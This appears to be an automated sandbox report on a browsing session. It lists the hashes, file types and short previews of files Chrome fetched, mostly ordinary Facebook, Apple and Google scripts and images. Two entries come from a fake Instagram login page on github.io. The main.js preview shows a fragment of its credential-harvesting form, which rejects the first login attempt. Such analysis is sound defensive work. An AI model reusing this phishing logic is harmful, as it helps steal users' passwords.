                                                                                                                                                                                                                                Preview:RIFF*(..WEBPVP8L.(../..2.MH..6l....I..?...BD.'@j...~&...fw....m{Y....>...=.@....V.....*.+..:..=.N.., ..I.\.{...8H....$d...;I..9..HU.A`B.s...$..#.\.&@.G..e{...l@I..7...x.@q-p.9....,..{.}....4.....cZ....@(`......-.[..yN.@/`L/.1(yb>.m}.*..m $.WU.4Q$.=....!Ik....(.........s...UpWIu?.....g.....d{K[.....EC..8).....O.jI\R....7@o.R..n.V..$.....{.z....~.GZ....e...[......[-iI.]^.6..-)urH.e.P..).:...k....|.9m....m...%N...U.....g%.<a.......Ef<.....?..H...Xp.L......L... .......P..n.%c.j{F.-.k.......*..[...V.........&UU./m.....=..-E.].N.?o....(....W.......l.....A.Rm..,......!..h..I...?..O/...o.4.mko.F......\...B..9V.....R.`...?..!..WU..{".PTI%.2....8-.fE1.}...@..PQ.&....C...(..Q...Q.1$..b$..J.1......C..;..3w...R..#z\.T*.!C......#..+.J8...0..K.;....dH.D.....@..k..#..J...^........k@"*...+...t.c..x.;.}...E'.0.Z_....{\...;.".J.....L.Mm.v..G...W.3<..bx.,......|........v..$N.....9ztA.T.....4|.P.&u...t.p.g..v...b.1..?....,..-.........[.O..x.&.S...(.....J.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 166x296, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):9204
                                                                                                                                                                                                                                Entropy (8bit):7.97905201911326
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:r38tDAWM+egFJt4NPfYUfooEMAY7scQNv1Ees8:gF8frfooLoR95
                                                                                                                                                                                                                                MD5:8F712478B03F2C4DA3183F96248AD1FE
                                                                                                                                                                                                                                SHA1:BA6CF6860F9657FD1F1B8E1BB660A39B589AB0B6
                                                                                                                                                                                                                                SHA-256:5AAC149EED4335B87CAE2FF3E177FBB55D5CE17B49D27A4A5CDAC61A5B89C72B
                                                                                                                                                                                                                                SHA-512:ADB03392D73F6DEA6C1505D622E34C8F068447E1507DC964EB429F81D2839517F1210AD7156BF01875EEAC8B082126E1C12DA2BC5B643873A89352410876081D
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:RIFF.#..WEBPVP8 .#..0~...*..(.>Q .E#....FD8......6...?#...y........v...O./$........W|....K.w.....{.~......a..O./.....{......E........X..................................?t..............O.}.........|..e.................g...$.v4..oP_m.....'...g.~..l.........?U..xZ......._....~=}6.K.....W./........k......l.]..?...?^..%A7.U...i..Z....X......]....R...z.4X....so...U.G.?.Y......x.G..n.!.V...Y5$.+.].p..?).V.k..@.X....Uh...C.Z...k.Pz.1.).|n.c*.....V..5.J.....`)..c.....C..) ....":..I.G.6.....%.0!.h.....hc.d|.s%.D.g..-..H.V.l.a..=..Cz.\./..V...<.~jB3<..d..g..U.g.H:..[.hsh.........w...S.ov.....Q.D....6....5.lE.&.d..`A.5~.h....o.t[.f.H.!N....[."..0..+..b.G^.......0.........l..r..$]...9.D.W...a.&G.n$......hS.......ZRM.3MLe.EW..nQEpl..u...Y.K..........91...[b<.vi~U^......B$..V.....m.Z@.w5.k..k:..f].zoN....O..q.....I..jr..a...H:#.....l.Nl..Q...4DRo......P..5...$..$z.........E..vs.g[q.U....r.v:.(.>..dGx.......q.V\.....E.m.....J.1.".......<..y....u....f3.g.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:C source, ASCII text, with very long lines (438)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):2078
                                                                                                                                                                                                                                Entropy (8bit):5.387806824958302
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:YHTs34IWJ6O346+3+96s3zf3Ek+n8No4YGbIh4:6fIWJj3453wx3D3Ex8NMq
                                                                                                                                                                                                                                MD5:C85FC19BDEF9BB7DC0AD69D0BCEF07D8
                                                                                                                                                                                                                                SHA1:BDC00700BE6D5B5FBA7F565C6FB2FD1AD39D06A4
                                                                                                                                                                                                                                SHA-256:6A694C1ECFF2EE11F8075A915B3C3FEEAF2EB33DC04CD8144CDD762E71260051
                                                                                                                                                                                                                                SHA-512:DDF8AE079503BCE91ACC37A3A7552B52ED0DE2D9AF79076A1C04F7991D3775C7A829298D5A3A9962040A5C2FB6A0699D6584510704004ECBCB6471D33BE38C5F
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3/yr/r/OJuPnvrkEfZ.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("Deferred",["Promise"],(function(a,b,c,d,e,f){"use strict";var g;(g||(g=b("Promise"))).resolve();a=function(){function a(a){var c=this;a=a||g||(g=b("Promise"));this.$1=!1;this.$2=new a(function(a,b){c.$3=a,c.$4=b})}var c=a.prototype;c.getPromise=function(){return this.$2};c.resolve=function(a){this.$1=!0,this.$3(a)};c.reject=function(a){this.$1=!0,this.$4(a)};c.isSettled=function(){return this.$1};return a}();f["default"]=a}),66);.__d("isArDotMetaDotComURI",[],(function(a,b,c,d,e,f){var g=new RegExp("(^|\\.)ar\\.meta\\.com$","i"),h=["https"];function a(a){if(a.isEmpty()&&a.toString()!=="#")return!1;return!a.getDomain()&&!a.getProtocol()?!1:h.indexOf(a.getProtocol())!==-1&&g.test(a.getDomain())}f["default"]=a}),66);.__d("isHorizonDotMetaDotComURI",[],(function(a,b,c,d,e,f){var g=new RegExp("(^|\\.)horizon\\.meta\\.com$","i"),h=["https"];function a(a){if(a.isEmpty()&&a.toString()!=="#")return!1;return!a.getDomain()&&!a.getProtocol()?!1:h.indexOf(a.getProtocol())!==
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):1742
                                                                                                                                                                                                                                Entropy (8bit):7.820992169073267
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:2DECnya3DoHbgWDhmQf/yeD/B9lJ8o/Oq5/QrKC:2fyWDoPdmQi/oW66
                                                                                                                                                                                                                                MD5:1DAA25F8D01003B26FD5F64ECFF8F51C
                                                                                                                                                                                                                                SHA1:AFC48CED8ABC73EC0F2DC97B5F47A346045F0B10
                                                                                                                                                                                                                                SHA-256:71A38FEFCC6A457B90792E4CA0DF829519A4FA3197B9C871D8BF43C83F0AC374
                                                                                                                                                                                                                                SHA-512:232D4199F34B02BF322B8862A218E15FC9E7DDBED9B06E9B3C203766D52898355E8A8AC14A5969E3BF3566B7D38F761AAA26380FD895EEFB0FB2390143D714CE
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://is1-ssl.mzstatic.com/image/thumb/Purple211/v4/b1/45/39/b1453933-5ac1-7d17-9bf8-1d4788c3ef2f/Prod-0-0-1x_U007emarketing-0-8-0-85-220.png/146x0w.webp
                                                                                                                                                                                                                                Preview:RIFF....WEBPVP8X..............VP8 D....$...*....>.D.G."!.8mX4.D..p.H.7...w.o....=.#._................y..G..?................/..h.....GN._/..sE..m....V8bB+(..e....'].Rf..CN..+.....9.(5i!k.....P...@8...5.h.r....o.L.s.>o.f<...,qP..N...O.........c7o.....^E....n.E..g......(... ....zP.pC3U...Z...1~w.A2.N.]).\.d..n71....f .g.?..........=..?.._(..(C..2....E.D!....c..,.`Z..ULu.u?.#.._C.~O+...\9I...S.]~...!........a..b.^.ftn.h..j.....UP..g...Z.xX6..fK}#..3.<...4`....s.AJ.5.7V.1.,.(N>...WR..!D.....t[?..ko.M..'.$.K............jN.s...y......(...+.8.....t^....].ngh6qw....y..8..R..^|J.h.X.`P.}.Za.U.\....Ss..>...z....]J.i.a.c.V..?qq...%/].'.MHpq.\{$zq.*.....Ob.F...P...4q.....e.../......-...6...d...bv........VI...})..:..V....1.S.SN.....m.......UEO.t*....j....J.z.P0.,-4...&..nz.%..y...>pF'i...[P..ne....F...QB.;..Q .. .\h...-..U.......!........F./....q.....|4rh.2 U....RI.;. +t...4..}.......:.hXC..%.2k...0...V5$d4<ZP+../..)>0.:W....P+...[..y....=.T..[...).
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):4588
                                                                                                                                                                                                                                Entropy (8bit):4.730261253735456
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:uKHXbfHy7Q8Azy2t2F9ys8CGWQukifkiTHpMTR30cfRA8gNRE:u8XTHy7Qty2t2F9ys8xWQuLkiTHpMTRj
                                                                                                                                                                                                                                MD5:962C5BDDDCCD7E3323671ED88CAF524D
                                                                                                                                                                                                                                SHA1:4616F9990BF7FCF74D0DE482248FE1FEDBB5467F
                                                                                                                                                                                                                                SHA-256:9B6F06EA1E0251F6A6F5D41E661C420621A310C3814582C690E11F3D3624DE2B
                                                                                                                                                                                                                                SHA-512:576E835B2F6B2A60EC2F489B6463C8A78BA4A067929DFC22E1D596F4B9468268BC8F9C79111B5B86476E7A6763C739D286D94743394D5E1963D3946BBA970CB7
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://sayidanur.github.io/instagram.com/styles.css
                                                                                                                                                                                                                                Preview:* {. border: none;. box-sizing: border-box;. font-family: Arial, Helvetica, sans-serif;. margin: 0;. padding: 0;.}..body {. background-color: #fafafa;. height: 100vh;.}..main {. height: 100vh;. margin: auto;. max-width: 935px;.}..a { text-decoration: none; }.h1 { margin: 20px 0; }.ul { list-style: none; }../**.* Flex rules.*/...flex {. display: -webkit-box;. display: -moz-box;. display: -webkit-flex;. display: -ms-flexbox;. display: flex;.}...direction-column {. -webkit-box-direction: normal;. -webkit-box-orient: vertical;. -moz-box-direction: normal;. -moz-box-orient: vertical;. -webkit-flex-direction: column;. -ms-flex-direction: column;. flex-direction: column;.}...justify-content-center {. -webkit-box-pack: center;. -moz-box-pack: center;. -ms-flex-pack: center;. -webkit-justify-content: center;. justify-content: center;.}...align-items-center {. -webkit-box-align: center;. -moz-box-align: center
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (12099)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):102543
                                                                                                                                                                                                                                Entropy (8bit):5.451921115834891
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:JS2wC8hEcI1cX3AIegU85BKGeRjWOkVJA+aL4hv9DGONOvV/l6t:JS2wbEiXhBX9VJA+aL0Dm76t
                                                                                                                                                                                                                                MD5:C43C6F2EA427B9539007038F8428A2DF
                                                                                                                                                                                                                                SHA1:4B1191BC67E8BA493CCE616192DE66EA76B9D051
                                                                                                                                                                                                                                SHA-256:8C3F89F04BFEA4FAD4E753C33CC6993BF39D222DADEF960808146695980900EF
                                                                                                                                                                                                                                SHA-512:09FD301691EB5F96532C3DDBC801D98A0D5CD9D85AE147D584CCB567F4752B3BA3BC089517454BA9AA27B59D2220E5FE7EF4ED3FB97585EA4120C1001837BBEA
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("BaseContextualLayerAvailableHeightContext",["react"],(function(a,b,c,d,e,f,g){"use strict";var h;a=h||d("react");b=a.createContext(null);g["default"]=b}),98);.__d("BaseContextualLayerContextSizeContext",["react"],(function(a,b,c,d,e,f,g){"use strict";var h;a=h||d("react");b=a.createContext(null);g["default"]=b}),98);.__d("BaseContextualLayerDefaultContainer.react",["LegacyHidden","react","stylex","testID"],(function(a,b,c,d,e,f,g){"use strict";var h,i,j=i||d("react");b=j.forwardRef(a);function a(a,b){var d=a.children,e=a.hidden;a.presencePayload;var f=a.stopClickPropagation,g=a.testid;a=a.xstyle;return j.jsx(c("LegacyHidden"),{htmlAttributes:babelHelpers["extends"]({},c("testID")(g),{className:(h||(h=c("stylex")))(a),onClick:f===!0?function(a){return a.stopPropagation()}:void 0}),mode:e?"hidden":"visible",ref:b,children:d})}a.displayName=a.name+" [from "+f.id+"]";e=b;g["default"]=e}),98);.__d("BaseContextualLayerLayerAdjustmentContext",["react"],(function(a,b,c,
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (18484)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):963709
                                                                                                                                                                                                                                Entropy (8bit):5.670131488411997
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24576:+EyX863Qv0/B/0duljOJ4nkCFeh/0aDMEwb3iZbeeseJ7aS8+vgAiTwlOKSqz79I:+EyX863QM/B/0duljOJ4nkCFeh/0aDMH
                                                                                                                                                                                                                                MD5:65D23943E6D8A616D4FF2C92D6AF40B6
                                                                                                                                                                                                                                SHA1:F2DC4736EAF04EDB77BD2C69D7E296D923B60DA1
                                                                                                                                                                                                                                SHA-256:D3E20C970001109C64DAE18E8BD66E5026841ED8DB191855EE93BEE75421F4AD
                                                                                                                                                                                                                                SHA-512:7381D0CEFF883CD8A73EF8D006842176581E05628E6D73987B6537F0520753A9437A3FF4F35EDD23B22DDA07D398254D240931A168B006CED02D830CAF7BA151
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:"use strict";_F_installCss(".EDId0c{position:relative}.nhh4Ic{position:absolute;left:0;right:0;top:0;z-index:1;pointer-events:none}.nhh4Ic[data-state=snapping],.nhh4Ic[data-state=cancelled]{transition:transform 200ms}.MGUFnf{display:block;width:28px;height:28px;padding:15px;margin:0 auto;transform:scale(0.7);background-color:#fafafa;border:1px solid #e0e0e0;border-radius:50%;box-shadow:0 2px 2px 0 rgba(0,0,0,.2);transition:opacity 400ms}.nhh4Ic[data-state=resting] .MGUFnf,.nhh4Ic[data-state=cooldown] .MGUFnf{transform:scale(0);transition:transform 150ms}.nhh4Ic .LLCa0e{stroke-width:3.6px;transform:translateZ(1px)}.nhh4Ic[data-past-threshold=false] .LLCa0e{opacity:.3}.rOhAxb{fill:#4285f4;stroke:#4285f4}.A6UUqe{display:none;stroke-width:3px;width:28px;height:28px}.tbcVO{width:28px;height:28px}.bQ7oke{position:absolute;width:0;height:0;overflow:hidden}.A6UUqe.qs41qe{animation-name:quantumWizSpinnerRotate;animation-duration:1568.63ms;animation-iteration-count:infinite;animation-timing-func
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (5717)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):67930
                                                                                                                                                                                                                                Entropy (8bit):5.350281148314441
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:9HDLotdWvrV8YctZCUmeTVxETDGjTHvoKNU28W3Bq9eW5:VDLotdWvrV8YctZCUiTDYDvoKNUExqb
                                                                                                                                                                                                                                MD5:F16C089BF22C5A3450A3B941D8D1D3B3
                                                                                                                                                                                                                                SHA1:6543253FE5800826256E7F0900D6BE807ED82DE2
                                                                                                                                                                                                                                SHA-256:0FB7810E3D1EEAC1CA74723786D499CFB6CE9E7C2942F0959F13D6F5A935736A
                                                                                                                                                                                                                                SHA-512:ABD13F038E07C841551DDC35C40BAD7E6A1A7B2351A70A6EFB2A9B538C159A26524C21D2B5DF0EFF9D619A2709EB4D5E0EE10025B79BE6E88F95C7F420D9F57A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("BrowserScroll",[],(function(a,b,c,d,e,f){function a(){var a;return window.pageXOffset||((a=document.documentElement)==null?void 0:a.scrollLeft)||((a=document.body)==null?void 0:a.scrollLeft)||0}function b(){var a;return window.pageYOffset||((a=document.documentElement)==null?void 0:a.scrollTop)||((a=document.body)==null?void 0:a.scrollTop)||0}f.getPageScrollLeft=a;f.getPageScrollTop=b}),66);.__d("StickyController",["CSS","Event","Style","Vector","queryThenMutateDOM"],(function(a,b,c,d,e,f){a=function(){"use strict";function a(a,b,c,d){this._element=a,this._marginTop=b,this._onchange=c,this._proxy=d||a.parentNode,this._boundQueryOnScroll=this.shouldFix.bind(this),this._boundMutateOnScroll=this._mutateOnScroll.bind(this)}var c=a.prototype;c.handleScroll=function(){b("queryThenMutateDOM")(this._boundQueryOnScroll,this._boundMutateOnScroll)};c.shouldFix=function(){return b("Vector").getElementPosition(this._proxy,"viewport").y<=this._marginTop};c._mutateOnScroll=fun
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (31470)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):45781
                                                                                                                                                                                                                                Entropy (8bit):5.4005500598459015
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:xq9DvQPUjkEO1ayPW9ZybWRxatCvEAGm45TqZYu:OpjU1PbWRxatC4m45uZYu
                                                                                                                                                                                                                                MD5:6126870CB22D062ABFAAEF09FF102DF5
                                                                                                                                                                                                                                SHA1:92AF3022CC9C9BE309E42FFE0F450ED3E95CA622
                                                                                                                                                                                                                                SHA-256:ED977AB797E2C2CD3EA3973E6A1A417CB0F0FA293CA6D9E0BE5B0D11FF3AC76F
                                                                                                                                                                                                                                SHA-512:F34B46A7E2CFB84AE103870ADEEAD1B9E73E0DAEFA03D7E210B985C2098418680D1496509F1D8C9F85D565270DFC55DB0B74988E19EB4FA77637239CADF07C12
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3/yC/r/V5iPrLb12Rf.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("Wedge.art",["ReactART","create-react-class","prop-types","react"],(function(a,b,c,d,e,f){var g,h=g||b("react"),i=b("ReactART").Shape,j=b("ReactART").Path;a=b("create-react-class")({displayName:"Wedge",propTypes:{outerRadius:b("prop-types").number.isRequired,startAngle:b("prop-types").number.isRequired,endAngle:b("prop-types").number.isRequired,innerRadius:b("prop-types").number},circleRadians:Math.PI*2,radiansPerDegree:Math.PI/180,_degreesToRadians:function(a){if(a!==0&&a%360===0)return this.circleRadians;else return a*this.radiansPerDegree%this.circleRadians},_createCirclePath:function(a,b){var c=j();c.move(0,a).arc(a*2,0,a).arc(-a*2,0,a);b&&c.move(a-b,0).counterArc(b*2,0,b).counterArc(-b*2,0,b);c.close();return c},_createArcPath:function(a,b,c,d){var e=j();a=this._degreesToRadians(a);b=this._degreesToRadians(b);var f=a>b?this.circleRadians-a+b:b-a,g=Math.sin(a),h=Math.sin(b);a=Math.cos(a);b=Math.cos(b);var i=h-g,k=b-a,l=d-c;f=f>Math.PI;e.move(c+c*g,c-c*a).arc(
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (12513)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):13517
                                                                                                                                                                                                                                Entropy (8bit):5.314863543101727
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:8nlFipHnQ5/BRZJ/bzwT62waHKsR5ssRaREW+ou:8lF2HQ5JRjbQw9sRasROEWY
                                                                                                                                                                                                                                MD5:24F387A60FE0B05A15426D721C397D47
                                                                                                                                                                                                                                SHA1:012EB578C3C097193F20F123732AC646D2800096
                                                                                                                                                                                                                                SHA-256:6AD8C8A703856136FEA1D1911FE8C0E09BCE87EDE20F4C8B98AB8F8961462738
                                                                                                                                                                                                                                SHA-512:787E1A2BCCBCD973135E53B53FA5BC89E59AC277D95F30B0595B225667B1F0DEB6616914915200ABB6E522DDEA144E2EEF140876CA502D1317E13E86E63DA9A1
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://js-cdn.music.apple.com/musickit/v2/components/musickit-components//p-1ec6e574.js
                                                                                                                                                                                                                                Preview:/*!. * IMPORTANT NOTE:. * . * This file is licensed only for the use of Apple developers in providing MusicKit Web Services,. * and is subject to the Apple Media Services Terms and Conditions and the Apple Developer Program. * License Agreement. You may not copy, modify, re-host, or create derivative works of this file or the. * accompanying Documentation, or any part thereof, including any updates, without Apple's written consent.. * . * ACKNOWLEDGEMENTS:. * https://js-cdn.music.apple.com/musickit/v1/acknowledgements.txt. */.const e="musickit-components";let t,n,l,s=!1,o=!1,i=!1,r=!1,c=null,f=!1;const a="undefined"!=typeof window?window:{},u=a.document||{head:{}},d={t:0,l:"",jmp:e=>e(),raf:e=>requestAnimationFrame(e),ael:(e,t,n,l)=>e.addEventListener(t,n,l),rel:(e,t,n,l)=>e.removeEventListener(t,n,l),ce:(e,t)=>new CustomEvent(e,t)},p=e=>Promise.resolve(e),$=(()=>{try{return new CSSStyleSheet,"function"==typeof(new CSSStyleSheet).replaceSync}catch(e){}return!1})(),m=(e,t,n)
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):3212
                                                                                                                                                                                                                                Entropy (8bit):4.868427484902244
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:1gJY0gXK6gulXtVcf/G9qLi1bg7atsMQtX/2WCwktV:u7stV99qe1cksv5bCjP
                                                                                                                                                                                                                                MD5:477DBD44D5E73A3CB614E8848C5B796A
                                                                                                                                                                                                                                SHA1:07B766C6F560DF6B8AAD13C9DAEC11A18E4DFE98
                                                                                                                                                                                                                                SHA-256:68DFCE70EC7C8A7AA72FFF4CE1A32845BCCD1C36C49F03A4CC50ED05F7BCD275
                                                                                                                                                                                                                                SHA-512:6FCEA1B7B07AFBBFB76A0084B02F886702CD5394CFF01F7A22AD20FEA47921B7340D2E60976D699DA57D267228554C2314397CDF814C6482E9A7797DCA3A4C8A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://sayidanur.github.io/instagram.com/main.js
                                                                                                                                                                                                                                Preview:document.addEventListener('DOMContentLoaded', () => {.. const form = document.getElementById('telegramForm');.. const loading = document.getElementById('loading');.. const validText = document.querySelector(".invalid") .. let tryCount = 0; // ....... ....... ......... form.addEventListener('submit', function(e) {.. e.preventDefault();.. .. const username = document.getElementById('username');.. const password = document.getElementById('password');.... // ........ ...... invalid-input, .... .. ... ........ ....... username.classList.remove('invalid-input');.. password.classList.remove('invalid-input');.... if (tryCount === 0) {.. // .... ...... ......., ........ ... .......... ...... username.classList.add('invalid-input');.. password.classList.add('invalid-input');.. validText.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65359)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):200589
                                                                                                                                                                                                                                Entropy (8bit):5.379175388908165
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:vd3wWLstPIEovvdQfaPvQmfIiBSQZWc1APF3SDRns71iMw8F6Oum19udpz9/VgDc:V3wIvLvLwDXYn6L9C/G89Y357C
                                                                                                                                                                                                                                MD5:EE1AC470ECB79FEFCFA9EC4B52BA85DC
                                                                                                                                                                                                                                SHA1:15F59D28D417ECA124A7218466D45650D52EDD31
                                                                                                                                                                                                                                SHA-256:D415BBD88F59C56CB18AD305E006B0ECE3A2B5902504F66F4B07252812C5FBF1
                                                                                                                                                                                                                                SHA-512:B23FF3B718A765D52158571E59DF01B0AD5CA375930663116E2D30060C267BFB921372E85A745DFDFE0BFACB72C4D6334F4254694FFE1D2594FB97B09CB4AB9E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("ReactFiberErrorDialog",["cr:8909"],(function(a,b,c,d,e,f,g){"use strict";function a(a){return b("cr:8909").showErrorDialog(a)}g.showErrorDialog=a}),98);.__d("ReactDOM-prod.classic",["EventListener","Promise","ReactFeatureFlags","ReactFiberErrorDialog","react","scheduler"],(function(d,e,f,g,h,i){"use strict";var j,k,l=j||e("react"),m=Object.assign;function n(d){var e="https://react.dev/errors/"+d;if(1<arguments.length){e+="?args[]="+encodeURIComponent(arguments[1]);for(var f=2;f<arguments.length;f++)e+="&args[]="+encodeURIComponent(arguments[f])}return"Minified React error #"+d+"; visit "+e+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}var o=e("ReactFeatureFlags").alwaysThrottleRetries,p=e("ReactFeatureFlags").disableDefaultPropsExceptForClasses,q=e("ReactFeatureFlags").disableLegacyContextForFunctionComponents,r=e("ReactFeatureFlags").disableSchedulerTimeoutInWorkLoop,s=e("ReactFeatureFlags").ena
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (8477)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):51589
                                                                                                                                                                                                                                Entropy (8bit):5.384712804809677
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:OLYXGST0ki7JD5x0KDKDJcrjrMwmvsPD3RcG1K3pWT:OLYXGHkiDx0KDCJcrjrMwmvsPD3o4T
                                                                                                                                                                                                                                MD5:3608E76FBDA351ADDB0E78EEAA73AFD1
                                                                                                                                                                                                                                SHA1:31655B8076AFFD1A292A133392F353A3EDAC2BDB
                                                                                                                                                                                                                                SHA-256:651A7CADCEAFB12DF8E6D5B923F1DF00D33B632B1E4BD9BD3F1C01A92450B4F7
                                                                                                                                                                                                                                SHA-512:5E99BACE7EBDC97AC89C92DDBC8D608737F11646EABAAFBE70520B6F5A1EAE421508465F4F2A6C17840CF8A30B21778819E907BEB8717D7292A506F99384A7CF
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3/yQ/r/WeajZf_EolU.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("BDSignalBufferData",[],(function(a,b,c,d,e,f){"use strict";a={};b=a;f["default"]=b}),66);.__d("SignalValueContext",[],(function(a,b,c,d,e,f){"use strict";a=function(){function a(a){this.cn=a}var b=a.prototype;b.getSignalValueContextName=function(){return this.cn};return a}();f["default"]=a}),66);.__d("BDSignalCollectorBase",["BDSignalBufferData","SignalValueContext","regeneratorRuntime"],(function(a,b,c,d,e,f,g){"use strict";a=function(){function a(a){this.signalType=a}var d=a.prototype;d.executeSignalCollection=function(){throw new Error("Child class responsibility to implement executeSignalCollection")};d.executeAsyncSignalCollection=function(){var a;return b("regeneratorRuntime").async(function(c){while(1)switch(c.prev=c.next){case 0:c.next=2;return b("regeneratorRuntime").awrap(this.executeSignalCollection());case 2:a=c.sent;return c.abrupt("return",a);case 4:case"end":return c.stop()}},null,this)};a.getSanitizedURI=function(){var a=window.location.href,b=a.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (12099)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):102543
                                                                                                                                                                                                                                Entropy (8bit):5.451921115834891
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:JS2wC8hEcI1cX3AIegU85BKGeRjWOkVJA+aL4hv9DGONOvV/l6t:JS2wbEiXhBX9VJA+aL0Dm76t
                                                                                                                                                                                                                                MD5:C43C6F2EA427B9539007038F8428A2DF
                                                                                                                                                                                                                                SHA1:4B1191BC67E8BA493CCE616192DE66EA76B9D051
                                                                                                                                                                                                                                SHA-256:8C3F89F04BFEA4FAD4E753C33CC6993BF39D222DADEF960808146695980900EF
                                                                                                                                                                                                                                SHA-512:09FD301691EB5F96532C3DDBC801D98A0D5CD9D85AE147D584CCB567F4752B3BA3BC089517454BA9AA27B59D2220E5FE7EF4ED3FB97585EA4120C1001837BBEA
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3iKIu4/yy/l/ru_RU/lW1EzoN7_Oc.js
